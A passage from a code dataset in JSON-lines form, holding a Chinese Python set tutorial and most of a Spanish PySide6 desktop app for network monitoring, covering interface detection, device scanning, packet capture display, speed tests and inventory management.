end='\\r')\n\nif __name__ == '__main__':\n Feduquiz().run()","repo_name":"fedus/feduquiz","sub_path":"feduquiz.py","file_name":"feduquiz.py","file_ext":"py","file_size_in_byte":17066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29337757292","text":"# set集合 去重、无序!\r\nmy_set = {'黑马', '白马', '红马', '绿马', '白马', '红马', '绿马', '白马', '红马', '绿马'}\r\nprint(\"my_set的类型是:{},内容为:{}\".format(type(my_set), my_set))\r\n\r\n# set.add()\r\nmy_set.add(\"皮马\")\r\nmy_set.add(\"绿马\")\r\nprint(my_set)\r\n\r\n# set.remove(元素) \r\n\r\n# set.pop() 随机取出一个集合内的元素并删除\r\n\r\n# set.clear()\r\n\r\n# set3 = set1.difference(set2) 选择set1中有,但set2中没有的元素,创建新集合set3 set1、set2均没有影响\r\n\r\n# set1.difference_update(set2) 在set1中消除set2中同样存在的元素 set1被修改\r\n\r\n# set3 = set1.union(set2) 合并set1、set2,并创建新集合set3\r\n\r\n# len(set)\r\n\r\n# 集合遍历只能用for 因为集合无序、不支持下标索引\r\n\r\nmy_list = ['黑马程序', '黑马', '黑马程', '无序', '黑马', '黑马程', '无序']\r\nmy_set = set()\r\n\r\nfor element in my_list:\r\n print('修改集合前为:{}'.format(my_set))\r\n my_set.add(element)\r\n print('修改集合后为:{}'.format(my_set))","repo_name":"ShenTengyu/python_learning","sub_path":"practice_py/practice/practice_basic_syntax/practice08_set.py","file_name":"practice08_set.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43428900002","text":"from modulos import *\r\n\r\n#Librerias funcionales de python\r\nimport os\r\nimport sys\r\nfrom time import sleep\r\nimport subprocess as sb\r\nfrom threading import Thread\r\nfrom openpyxl import Workbook\r\nfrom datetime import datetime as dt\r\nfrom webbrowser import open as WebOpen\r\nfrom scapy.all import sniff\r\nfrom getpass import getuser\r\n#Librerias de la interfaz Grafica\r\nfrom PySide6.QtGui import QPixmap,QPainter,QIcon,QColor\r\nfrom PySide6.QtWidgets import QApplication, QMainWindow, QHBoxLayout, QLabel,QWidget,QVBoxLayout, QGridLayout,QFrame,QPushButton, QTableWidgetItem\r\nfrom PySide6.QtCharts import QBarSeries,QBarSet,QBarCategoryAxis,QChart,QLineSeries,QChartView,QPieSeries\r\nfrom PySide6.QtCore import Qt,QEasingCurve,QPropertyAnimation,Signal,QFile,QTextStream\r\nfrom modulos.UI_Interfaz import Ui_MainWindow\r\nimport socket\r\nos.environ[\"QT_FONT_DPI\"] = \"96\"\r\n\r\nclass Informacion_Red():\r\n INTERFAZ=\"\"\r\n GATEWAY=\"\"\r\n auxGate=\"\"\r\n IPV4=\"\"\r\n CAMBIOS=False\r\n SALIR=False\r\n SSID=\"\"\r\n MASCARA=\"\"\r\n Errores=[]\r\n VENTANA=\"\"\r\n TEMA=\"\"\r\n DETECCION=\"\"\r\n TIEMPO_DETECCION=0\r\n TIEMPO_PAQ=0\r\n CONEXION=True\r\n def __init__(self) -> None:\r\n self.Iniciarconfiguracion()\r\n dis=rs.Obtener_Dispositivos(True)\r\n auxIns=[]\r\n for INTER in dis:\r\n if \"WI-FI\" in INTER[0].upper() or \"WIFI\" in INTER[0].upper() or \"ETHER\" in INTER[0].upper():\r\n auxIns.append(INTER[0])\r\n if INTER[3] != \"--\" and INTER[3] != \"127.0.0.1\" and INTER[5]!=\"--\" and \"VIRTUAL\" not in INTER[0].upper():\r\n self.INTERFAZ=INTER[0]\r\n self.MASCARA=INTER[4]\r\n self.GATEWAY=INTER[5]\r\n self.IPV4=INTER[3]\r\n self.SSID=rs.obtener_SSID(self.INTERFAZ)\r\n if self.SSID=='NO TIENE':\r\n try:\r\n self.SSID=str(socket.getfqdn(self.GATEWAY))\r\n if self.SSID==self.GATEWAY:\r\n try:\r\n self.SSID=str(rs.get_mac_details(rs.escanearARP_U(self.GATEWAY,self.INTERFAZ,2,False)[1]))\r\n except:\r\n self.SSID=self.GATEWAY\r\n except:\r\n try:\r\n self.SSID=str(rs.get_mac_details(rs.escanearARP_U(self.GATEWAY,self.INTERFAZ,2,False)[1]))\r\n except:\r\n self.SSID=self.GATEWAY\r\n self.auxGate=self.GATEWAY\r\n aux=db.consultarRED()\r\n encontrado=False\r\n for i in aux:\r\n if i[1]==self.SSID:\r\n encontrado=True\r\n if encontrado==False and self.SSID!='POR DEFECTO' and self.SSID != \"SIN CONEXION\" and self.SSID != \"--\" and self.SSID != \"\":\r\n db.insertarRED(self.SSID,\"Pendiente\",0,0,1)\r\n if self.SSID==\"SIN CONEXION\":\r\n print(\"[!] No hay conexión con ninguna red.\")\r\n self.IPV4=\"--\"\r\n self.GATEWAY=\"--\"\r\n self.CONEXION=False\r\n self.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Sin red.\",\"No hay conexión con ninguna red.\"]) \r\n e=False\r\n if len(auxIns)>0:\r\n for a in auxIns:\r\n if \"VIRTUAL\" not in a.upper():\r\n self.INTERFAZ=a\r\n e=True\r\n break\r\n if e==False:\r\n print(\"[!] No hay interfaces de red.\")\r\n self.INTERFAZ=\"Wi-Fi\" \r\n def setIPV4(self,ipv4):\r\n self.IPV4=ipv4 \r\n def getIPV4(self):\r\n return self.IPV4\r\n def setGATEWAY(self,gate):\r\n self.GATEWAY=gate\r\n def getGATEWAY(self):\r\n return self.GATEWAY\r\n def setInterfaz(self,inter):\r\n self.INTERFAZ=inter\r\n def getInterfaz(self):\r\n return self.INTERFAZ\r\n def Iniciarconfiguracion(self):\r\n if os.path.exists('modulos/BasesDatos/configuracion.conf')==False:\r\n config=open(\"modulos/BasesDatos/configuracion.conf\",\"w\",encoding=\"utf-8\")\r\n self.VENTANA=\"Propia del Software\"\r\n config.write('Propia del Software\\n')\r\n self.TEMA=\"Obscuro\"\r\n config.write('Obscuro\\n')\r\n self.DETECCION=\"Preciso (ARP y Ping)\"\r\n config.write('Preciso (ARP y Ping)\\n')\r\n self.TIEMPO_DETECCION=20.0\r\n config.write('20\\n')\r\n self.TIEMPO_PAQ=0.5\r\n config.write('0.5')\r\n config.close()\r\n else:\r\n aux=open(\"modulos/BasesDatos/configuracion.conf\",\"r\",encoding=\"utf-8\")\r\n contenido=aux.readlines()\r\n self.VENTANA=contenido[0].replace(\"\\n\",\"\")\r\n self.TEMA=contenido[1].replace(\"\\n\",\"\")\r\n self.DETECCION=contenido[2].replace(\"\\n\",\"\")\r\n self.TIEMPO_DETECCION=float(contenido[3].replace(\"\\n\",\"\"))\r\n self.TIEMPO_PAQ=float(contenido[4].replace(\"\\n\",\"\"))\r\n aux.close()\r\n def verificarNpcap(self):\r\n if os.path.isdir('C:\\\\Program Files\\\\Npcap') or os.path.isdir('C:\\\\Program Files (x86)\\\\Npcap') or os.path.isdir('C:\\\\Archivos de programa\\\\Npcap') or os.path.isdir('C:\\\\Archivos de programa (x86)\\\\Npcap') or os.path.isdir('C:\\\\Program Files\\\\WinPcap') or os.path.isdir('C:\\\\Program Files (x86)\\\\WinPcap') or os.path.isdir('C:\\\\Archivos de programa\\\\WinPcap') or os.path.isdir('C:\\\\Archivos de programa (x86)\\\\WinPcap'):\r\n print(\"-- DEPENDENCIA: Winpcap esta instalado.\")\r\n else:\r\n print(\"[i] DEPENDENCIA: Winpcap no esta instalado.\")\r\n sb.run(('Dependencias/winpcap.exe'))\r\n os.execl(sys.executable, \"main.py\", *sys.argv)\r\n def verificarSpeed(self):\r\n if os.path.isdir(os.path.expanduser('~')+'\\\\AppData\\\\Roaming\\\\Ookla'):\r\n print(\"-- DEPENDENCIA: Terminos de Ookla aceptados.\")\r\n else:\r\n print(\"[!] DEPENDENCIA: No se han aceptado los terminos de Ookla, corrigiendo.\")\r\n print(\"\\n\")\r\n print(\"######################################################################\")\r\n print(\"## Para comenzar acepte los terminos de SpeedTest, coloque YES ##\")\r\n print(\"######################################################################\")\r\n sb.run([\"modulos/SpeedTest/speedtest.exe\"])\r\n \r\nclass DispositivosClass(QFrame):\r\n INTER=None\r\n def __init__(self,INTER,tema,info):\r\n super(DispositivosClass,self).__init__()\r\n NOM=QLabel()\r\n self.INTER=INTER\r\n if INTER[3] != \"--\" or INTER[6] != \"--\":\r\n NOM.setText(\"Nombre Interfaz:
->\"+INTER[0]+\"
ID:
->\"+INTER[1]+\"
MAC:
->\"+INTER[2]+\"
IPv4:
  • IP: \"+INTER[3]+\"
  • Sub-Máscara:\"+INTER[4]+\"
  • Gateway:\"+INTER[5]+\"
IPV6: \"+INTER[6])\r\n elif INTER[3] != \"--\":\r\n NOM.setText(\"Nombre Interfaz:
->\"+INTER[0]+\"
ID:
->\"+INTER[1]+\"
MAC:
->\"+INTER[2]+\"
IPv4:
  • IP: \"+INTER[3]+\"
  • Sub-Máscara:\"+INTER[4]+\"
  • Gateway:\"+INTER[5]+\"
\")\r\n elif INTER[6] != \"--\":\r\n NOM.setText(\"Nombre Interfaz:
->\"+INTER[0]+\"
ID:
->\"+INTER[1]+\"
MAC:
->\"+INTER[2]+\"
IPV6: \"+INTER[6])\r\n else:\r\n NOM.setText(\"Nombre Interfaz:
->\"+INTER[0]+\"
ID:
->\"+INTER[1]+\"
MAC:
->\"+INTER[2])\r\n\r\n #BROADCAST=QLabel(INTER[7])\r\n Layout = QGridLayout()\r\n label = QLabel(self)\r\n if \"Wi-Fi\" in INTER[0] or \"WI-FI\" in INTER[0] or \"wi-fi\" in INTER[0] or \"Wireless\" in INTER[0] or \"WIRELESS\" in INTER[0] or \"wireless\" in INTER[0] or \"wlan\" in INTER[0] or \"wlp\" in INTER[0]:\r\n pixmap = QPixmap('Imagenes/INTER/WIFI.png').scaled(50,50)\r\n elif \"Virtual\" in INTER[0] or \"VIRTUAL\" in INTER[0] or \"virtual\" in INTER[0] or \"VM\" in INTER[0]:\r\n pixmap = QPixmap('Imagenes/INTER/VMW.png').scaled(50,50)\r\n elif \"Local\" in INTER[0] or \"local\" in INTER[0] or \"LOCAL\" in INTER[0]:\r\n pixmap = QPixmap('Imagenes/INTER/LAN.png').scaled(50,50)\r\n elif \"BLUETOOTH\" in INTER[0] or \"Bluetooth\" in INTER[0] or \"bluetooth\" in INTER[0] or \"luetoo\" in INTER[0]:\r\n pixmap = QPixmap('Imagenes/INTER/BLUE.png').scaled(50,50)\r\n else:\r\n pixmap = QPixmap('Imagenes/INTER/DESC.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n Aux2=QWidget()\r\n Aux = QHBoxLayout()\r\n Aux2.setLayout(Aux)\r\n Aux.addWidget(QLabel(\"\"))\r\n Aux.addWidget(label)\r\n Aux.addWidget(QLabel(\"\"))\r\n Layout.addWidget(Aux2,0,0)\r\n Layout.addWidget(NOM,1,0)\r\n\r\n def SeleccionInter():\r\n info.setInterfaz(self.INTER[0])\r\n info.setIPV4(self.INTER[3])\r\n info.MASCARA=self.INTER[4]\r\n info.setGATEWAY(self.INTER[5])\r\n info.CAMBIOS=True\r\n if INTER[3] != \"--\" and INTER[3] != \"127.0.0.1\" and INTER[5]!=\"--\":\r\n SELECT = QPushButton(\"Seleccionar Interfaz\")\r\n if tema==\"Obscuro\":\r\n SELECT.setStyleSheet(\"background-color:#2c313c; border-radius:3px;\")\r\n else:\r\n SELECT.setStyleSheet(\"background-color:#D8D8D8;border: 1px solid;border-color:#333333;\")\r\n\r\n SELECT.clicked.connect(SeleccionInter)\r\n Layout.addWidget(SELECT,2,0)\r\n if tema==\"Obscuro\":\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#1f232a; Border-Radius:10px; }\")\r\n else:\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#D8D8D8; Border-Radius:10px; }\")\r\n self.setLayout(Layout)\r\nclass pendientesClass(QFrame):\r\n def __init__(self,INTER,tema,inf):\r\n super(pendientesClass,self).__init__()\r\n FECHA=INTER[2]\r\n DES=INTER[1]\r\n RED=INTER[6]\r\n Layout = QGridLayout()\r\n label = QLabel(self)\r\n pixmap = QPixmap('Imagenes/pendientes.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n Aux2=QWidget()\r\n Aux = QHBoxLayout()\r\n Aux2.setLayout(Aux)\r\n Layout.addWidget(label,0,0)\r\n Layout.addWidget(QLabel(FECHA),0,1)\r\n Layout.addWidget(QLabel(RED),0,2)\r\n Layout.addWidget(QLabel(DES),0,3)\r\n if tema==\"Obscuro\":\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#1f232a; Border-Radius:10px; }\")\r\n else:\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#D8D8D8; Border-Radius:10px; }\") \r\n self.setLayout(Layout)\r\nclass UsuariosClass(QFrame):\r\n def __init__(self,INTER,tema,inf):\r\n super(UsuariosClass,self).__init__()\r\n Layout = QGridLayout()\r\n label = QLabel(self)\r\n if INTER[0] == inf.GATEWAY:\r\n pixmap = QPixmap('Imagenes/DISP/ROUTER.png').scaled(50,50)\r\n elif INTER[0] != INTER[3]:\r\n pixmap = QPixmap('Imagenes/DISP/PC.png').scaled(50,50)\r\n else:\r\n pixmap = QPixmap('Imagenes/DISP/HOST.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n NOM=QLabel()\r\n if INTER[0] == inf.IPV4:\r\n NOM.setText(\"Usuario: \"+INTER[3]+\" (Tu Dispositivo)
IP: \"+INTER[0]+\"
MAC: \"+INTER[1]+\"
Vendor: \"+INTER[2])\r\n else:\r\n NOM.setText(\"Usuario: \"+INTER[3]+\"
IP: \"+INTER[0]+\"
MAC: \"+INTER[1]+\"
Vendor: \"+INTER[2])\r\n NOM.wordWrap()\r\n Aux2=QWidget()\r\n Aux = QHBoxLayout()\r\n Aux2.setLayout(Aux)\r\n Aux.addWidget(QLabel(\"\"))\r\n Aux.addWidget(label)\r\n Aux.addWidget(QLabel(\"\"))\r\n Layout.addWidget(label,0,0)\r\n Layout.addWidget(NOM,1,0)\r\n if tema==\"Obscuro\":\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#1f232a; Border-Radius:10px; }\")\r\n else:\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#D8D8D8; Border-Radius:10px; }\") \r\n self.setLayout(Layout)\r\nclass TraficoVar():\r\n VAR=[\"ID\",\"T\",\"P\",\"L\",\"S\",\"D\",\"E\"]\r\n Cerrar=False\r\n Borrar=False\r\n velocidad=[]\r\nclass MainWindow(QMainWindow):\r\n signalUser = Signal(int)\r\n signalPing = Signal(int)\r\n signalTrafico = Signal(int)\r\n SignalV=Signal(int)\r\n tab=Signal(int)\r\n SignalVT=Signal(int)\r\n SignalVTL=Signal(int)\r\n SignalA=Signal(int)\r\n\r\n GLOBAL_STATE=False\r\n inf=Informacion_Red()\r\n TrafObj=TraficoVar()\r\n\r\n VEL=None\r\n def __init__(self):\r\n super(MainWindow, self).__init__()\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n self.GLOBAL_STATE=False\r\n ##QUITAR DECORACION \r\n if self.inf.VENTANA==\"Propia del Software\":\r\n self.setWindowFlags(Qt.FramelessWindowHint)\r\n else:\r\n self.ui.SalirBtn.hide()\r\n self.ui.MinBtn.hide()\r\n self.ui.MaxBtn.hide()\r\n if self.inf.TEMA!=\"Obscuro\":\r\n file = QFile(\"modulos/BasesDatos/claro.qss\")\r\n file.open(QFile.ReadOnly | QFile.Text)\r\n stream = QTextStream(file)\r\n self.setStyleSheet(stream.readAll())\r\n self.inf.verificarNpcap()\r\n self.inf.verificarSpeed()\r\n ##############################################\r\n ## ACCION DE LOS BOTONES\r\n ##############################################\r\n self.ui.SalirBtn.clicked.connect(self.Cerrar)\r\n self.ui.MinBtn.clicked.connect(self.Minimizar)\r\n self.ui.MaxBtn.clicked.connect(self.Maximizar_Restaurar)\r\n\r\n self.ui.Menu.clicked.connect(lambda: self.Menu_Izquierdo())\r\n self.ui.AjustesBtn.clicked.connect(self.Ajustes)\r\n self.ui.AyudaBtn.clicked.connect(self.Ayuda)\r\n self.ui.UserBtn.clicked.connect(lambda: self.Usuarios())\r\n self.ui.InterRedBtn.clicked.connect(lambda: self.Dipositivos())\r\n self.ui.AlertasBtn.clicked.connect(lambda: self.Alerta())\r\n \r\n self.ui.IPConfBtn.clicked.connect(lambda:self.IPCONFIG())\r\n self.ui.PingBtn.clicked.connect(lambda:self.PING())\r\n self.ui.ArpBtn.clicked.connect(lambda: self.ARP())\r\n self.ui.TracerBtn.clicked.connect(lambda:self.TRACERT())\r\n self.ui.RouteBtn.clicked.connect(lambda:self.ROUTE())\r\n self.ui.IPConfBtn.clicked.connect(lambda:self.IPCONFIG())\r\n self.ui.NSLookBtn.clicked.connect(lambda:self.NS())\r\n\r\n self.ui.AplicarAjusBtn.clicked.connect(self.AplicarConf)\r\n\r\n\r\n ##############################################\r\n ## BOTONES PAGINAS\r\n ##############################################\r\n self.ui.VelocidadBtn.clicked.connect(self.Velocidad)\r\n self.ui.DashboardBtn.clicked.connect(self.DashBoard)\r\n self.ui.GestionBtn.clicked.connect(self.Gestion)\r\n self.ui.TraficoBtn.clicked.connect(self.Trafico)\r\n self.ui.UtilidadesBtn.clicked.connect(self.Utilidades)\r\n self.ui.RerportesBtn.clicked.connect(self.Reportes)\r\n self.ui.BasuraNotif.clicked.connect(self.BorrarNo)\r\n ######################## Menus\r\n self.ui.DerechoBtn.clicked.connect(self.cerrar_MenuD)\r\n self.ui.MasMenuBtn.clicked.connect(self.cerrar_MenuC)\r\n self.ui.CerrarNotif.clicked.connect(self.cerrar_MenuN)\r\n\r\n self.ui.FiltradoSpeed.textChanged.connect(self.FiltrarSpeed)\r\n self.ui.Filtrado.textChanged.connect(self.FiltrarPaquete)\r\n ##Funcionalidades\r\n self.ui.PruebaVelBtn.clicked.connect(self.pruebaVel) \r\n self.ui.PruebaVelTBtn.clicked.connect(self.pruebaVelT) \r\n self.ui.BorrarPruebas.clicked.connect(self.borrarVel)\r\n #Trafico de paquetes\r\n self.ui.InicioTraficoBtn.clicked.connect(self.trafico)\r\n ############## Botones Gestion\r\n\r\n self.ui.G_PR.clicked.connect(self.DBproblemasRed)\r\n self.ui.G_R.clicked.connect(self.DBreportes)\r\n self.ui.G_I.clicked.connect(self.DBinvernario)\r\n self.ui.G_P.clicked.connect(self.DBProveedores)\r\n self.ui.G_RD.clicked.connect(self.DBRedes)\r\n self.ui.G_C.clicked.connect(self.DBConexiones)\r\n self.ui.G_H.clicked.connect(self.DBHosts)\r\n self.ui.G_CR.clicked.connect(self.DBControlRed)\r\n self.ui.G_SU.clicked.connect(self.DBUnidades)\r\n self.ui.G_D.clicked.connect(self.DBDepartamentos)\r\n self.ui.GAgregarBtn.clicked.connect(self.DBagregar)\r\n self.ui.GModificarBtn.clicked.connect(self.DBModificar)\r\n self.ui.GEliminarBtn.clicked.connect(self.DBEliminar)\r\n\r\n self.ui.CR_ADD.clicked.connect(self.DBCR_ADD)\r\n self.ui.D_ADD.clicked.connect(self.DBD_ADD)\r\n self.ui.I_ADD.clicked.connect(self.DBI_ADD)\r\n self.ui.P_ADD.clicked.connect(self.DBP_ADD)\r\n self.ui.G_AgregarBtn.clicked.connect(self.DBP_PR)\r\n self.ui.R_ADD.clicked.connect(self.DBP_R)\r\n self.ui.RD_ADD.clicked.connect(self.DBP_RD)\r\n self.ui.SU_ADD.clicked.connect(self.DBP_SU)\r\n \r\n self.ui.GFiltrado.textChanged.connect(self.Filtrar)\r\n ############### Utilidades\r\n self.ui.PingIniciarBtn.clicked.connect(self.utilidadPingIniciar)\r\n self.ui.PingAyudaBtn.clicked.connect(self.utilidadPingAyuda)\r\n\r\n self.ui.Iconfig1.clicked.connect(self.IPCAll)\r\n self.ui.Iconfig2.clicked.connect(self.IPCDDNS)\r\n self.ui.Iconfig3.clicked.connect(self.IPCFDNS)\r\n self.ui.Iconfig4.clicked.connect(self.IPCRDNS)\r\n self.ui.Iconfig5.clicked.connect(self.IPCAYUDA)\r\n self.ui.Iconfig6.clicked.connect(self.IPCMANUAL)\r\n \r\n self.ui.arp1.clicked.connect(self.ARPA)\r\n self.ui.arp2.clicked.connect(self.ARPC)\r\n self.ui.arp5.clicked.connect(self.ARPADD)\r\n self.ui.arp7.clicked.connect(self.ARPR)\r\n self.ui.ArpAyuda.clicked.connect(self.ARPAY)\r\n\r\n self.ui.NSLOIniciarBtn.clicked.connect(self.NSLOI)\r\n self.ui.NSLOAyudaBtn.clicked.connect(self.NSLOA)\r\n\r\n self.ui.TracertAyudaBtn.clicked.connect(self.tracertA)\r\n self.ui.TracertIniciarBtn.clicked.connect(self.tracertI)\r\n\r\n self.ui.var1.clicked.connect(self.VMac)\r\n self.ui.var2.clicked.connect(self.VARP)\r\n self.ui.var3.clicked.connect(self.speedtest)\r\n self.ui.var4.clicked.connect(self.fast)\r\n self.ui.var5.clicked.connect(self.MRed)\r\n self.ui.var6.clicked.connect(self.MTareas)\r\n self.ui.var7.clicked.connect(self.RCompartidos)\r\n self.ui.var8.clicked.connect(self.cmd)\r\n ############### Reportes\r\n self.ui.GRG.clicked.connect(self.RGeneral)\r\n self.ui.GR1.clicked.connect(self.RVelocidad)\r\n self.ui.GR2.clicked.connect(self.RServicio)\r\n self.ui.GR3.clicked.connect(self.RClues)\r\n self.ui.GR4.clicked.connect(self.RDisp)\r\n self.ui.GR5.clicked.connect(self.RHistorial)\r\n self.ui.GR6.clicked.connect(self.RProveedores)\r\n self.ui.GR7.clicked.connect(self.RInventario)\r\n self.ui.GR8.clicked.connect(self.RProblemas)\r\n\r\n self.ui.GRBorrarH.clicked.connect(self.BRHistorial)\r\n self.ui.GRBorrarS.clicked.connect(self.BRServicio)\r\n self.ui.GRBorrarP.clicked.connect(self.BRPruebas)\r\n self.ui.GRBorrarPr.clicked.connect(self.BRProblemas)\r\n\r\n\r\n ############### Trafico \r\n self.ui.VerDomBtn.clicked.connect(self.dominios)\r\n self.ui.SalirSalidaPaq.clicked.connect(self.salirPaq)\r\n self.ui.RestabBtn.clicked.connect(self.BorrarTabla)\r\n ###############Señales\r\n self.signalUser.connect(self.UsuariosDisp)\r\n self.signalPing.connect(self.putPing)\r\n self.signalTrafico.connect(self.FiltrarPaquete)\r\n self.SignalV.connect(self.putVelocidad)\r\n self.SignalVT.connect(self.putVelocidadT)\r\n self.SignalVTL.connect(self.pruebaCompletaVT)\r\n self.senalS.connect(self.crearGraficaSignal)\r\n self.SignalA.connect(self.SignalAlerta)\r\n self.tab.connect(self.crearTablas)\r\n ##############Modificar tabla\r\n \r\n self.ui.PINGOUT.setColumnWidth(0,50)\r\n self.ui.PINGOUT.setColumnWidth(1,100)\r\n self.ui.PINGOUT.setColumnWidth(2,100)\r\n self.ui.PINGOUT.setColumnWidth(3,70)\r\n self.ui.PINGOUT.setColumnWidth(4,70)\r\n\r\n self.ui.TablaPaquetes.doubleClicked.connect(self.Doubleclick)\r\n self.ui.SalidaGestion.doubleClicked.connect(self.dobleGestion)\r\n self.ui.TablaVelocidad.doubleClicked.connect(self.dobleVelocidad)\r\n \r\n self.ui.Ajus4.textChanged.connect(lambda text: self.validarNumero(self.ui.Ajus4))\r\n self.ui.Ajus5.textChanged.connect(lambda text: self.validarNumero(self.ui.Ajus5))\r\n self.ui.RD_DAJ.textChanged.connect(lambda text: self.validarNumero(self.ui.RD_DAJ))\r\n self.ui.RD_SUB.textChanged.connect(lambda text: self.validarNumero(self.ui.RD_SUB))\r\n self.ui.ping3.textChanged.connect(lambda text: self.validarNumero(self.ui.ping3))\r\n self.ui.ping12.textChanged.connect(lambda text: self.validarNumero(self.ui.ping12))\r\n self.ui.ping2.textChanged.connect(lambda text: self.validarNumero(self.ui.ping2))\r\n self.ui.ping4.textChanged.connect(lambda text: self.validarNumero(self.ui.ping4))\r\n self.ui.tracert1.textChanged.connect(lambda text: self.validarNumero(self.ui.tracert1))\r\n self.ui.tracert2.textChanged.connect(lambda text: self.validarNumero(self.ui.tracert2))\r\n self.actualizarDatosDash()\r\n self.crearTablas()\r\n \r\n self.DBproblemasRed()\r\n disp = QVBoxLayout()\r\n disp.addWidget(QLabel(f\"

Buscando Dispositivos en {self.inf.SSID}...

\")) \r\n aux2=QWidget()\r\n aux2.setLayout(disp)\r\n aux2.setContentsMargins(0,0,0,0)\r\n self.ui.scrollArea_2.setWidget(aux2)\r\n self.ui.label_5.setText(f\"

Red: {self.inf.SSID}      IPv4: {self.inf.IPV4}      Gateway: {self.inf.GATEWAY}

\")\r\n\r\n self.mostrarErrores()\r\n \r\n Usuarios = Thread(target=self.hilo_usuarios)\r\n Usuarios.start()\r\n RedCambios = Thread(target=self.CambiosRed)\r\n RedCambios.start()\r\n\r\n sen=Thread(target=self.senal)\r\n sen.start()\r\n self.ui.SpeedRed.setText(self.inf.SSID)\r\n\r\n velocidad=None\r\n def dobleVelocidad(self):\r\n row_number=0\r\n for idx in self.ui.TablaVelocidad.selectionModel().selectedIndexes():\r\n row_number = idx.row()\r\n aux=[]\r\n for i in range(0,self.ui.TablaVelocidad.columnCount()):\r\n aux.append(self.ui.TablaVelocidad.item(row_number,i).text())\r\n r=db.consultar(f\"SELECT ID_RED,SUBIDA,BAJADA FROM RED WHERE SSID='{aux[5]}'\")\r\n subida=r[0][1] \r\n bajada=r[0][2]\r\n SubidaPor=float(aux[6])*100/subida\r\n BajadaPor=float(aux[7])*100/bajada\r\n if self.inf.TEMA==\"Obscuro\":\r\n BIEN=\"QFrame{background-color:#282a36; border:10px solid; border-color:#02AC66;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MEDIO=\"QFrame{background-color:#282a36; border:10px solid; border-color:#024A86;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MAL=\"QFrame{background-color:#282a36; border:10px solid; border-color:#C82A54;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n else:\r\n BIEN=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#02AC66;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MEDIO=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#024A86;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MAL=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#C82A54;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n self.ui.Subida_Salida.setText(aux[6]+\" Mbps\")\r\n if SubidaPor>90: self.ui.Subida_C.setStyleSheet(BIEN)\r\n elif SubidaPor<90 and SubidaPor>50: self.ui.Subida_C.setStyleSheet(MEDIO)\r\n elif SubidaPor>50: self.ui.Subida_C.setStyleSheet(MAL)\r\n self.ui.Velocidad_Salida.setText(aux[7]+\" Mbps\")\r\n if BajadaPor>90: self.ui.Velocidad_C.setStyleSheet(BIEN)\r\n elif BajadaPor<90 and BajadaPor>50: self.ui.Velocidad_C.setStyleSheet(MEDIO)\r\n elif BajadaPor>50: self.ui.Velocidad_C.setStyleSheet(MAL)\r\n self.ui.Ping_Salida.setText(aux[10]+\" ms\")\r\n if float(aux[10])<50: self.ui.Ping_C.setStyleSheet(BIEN)\r\n elif float(aux[10])<100 and float(aux[10])>50: self.ui.Ping_C.setStyleSheet(MEDIO)\r\n elif float(aux[10])>100: self.ui.Ping_C.setStyleSheet(MAL)\r\n\r\n self.ui.SpeedRed.setText(aux[5])\r\n self.ui.SpeedBajada.setText(aux[9]+\" ms\")\r\n self.ui.SpeedSubida.setText(aux[8]+\" ms\")\r\n self.ui.SpeedServidor.setText(aux[3])\r\n self.ui.SpeedSponsor.setText(aux[4])\r\n def borrarVel(self):\r\n db.ejecutarAccion(\"DELETE FROM PRUEBAS_VELOCIDAD\")\r\n self.DBPruebas() \r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Pruebas de Velocidad\",\"Se han borrado las pruebas de red.\"])\r\n def pruebaVel(self):\r\n self.ui.PruebaVelBtn.setStyleSheet(\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px; color:#FFFFFF;\")\r\n self.ui.PruebaVelBtn.setText(\"Espera un momento\")\r\n self.ui.PruebaVelBtn.setEnabled(False)\r\n self.ui.PruebaVelTBtn.setEnabled(False)\r\n \r\n hilo=Thread(target=self.hiloVel)\r\n hilo.start()\r\n def pruebaVelT(self):\r\n self.ui.PruebaVelTBtn.setStyleSheet(\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px; color:#FFFFFF;\")\r\n self.ui.PruebaVelTBtn.setText(\"Espera un momento\")\r\n self.ui.PruebaVelTBtn.setEnabled(False)\r\n self.ui.PruebaVelBtn.setEnabled(False)\r\n hilo=Thread(target=self.hiloVelT)\r\n hilo.start()\r\n def hiloVelT(self):\r\n try:\r\n self.velocidad=sd.velocidad_Todo(self.TrafObj,self.SignalVT,self.inf,self.SignalVTL)\r\n except:\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Conexión red.\",\"Hay un error general\"])\r\n self.mostrarErrores()\r\n self.ui.PruebaVelTBtn.setEnabled(True)\r\n self.ui.PruebaVelBtn.setEnabled(True)\r\n def hiloVel(self):\r\n try:\r\n self.velocidad=sd.Velocidad_Internet(self.inf)\r\n self.SignalV.emit(1)\r\n except:\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",self.inf.SSID,\"No hay internet en la red para la prueba.\"])\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.PruebaVelBtn.setStyleSheet(\"border-radius:10px;background-color: #1f232a;\tpadding: 8px 8px;\")\r\n else:\r\n 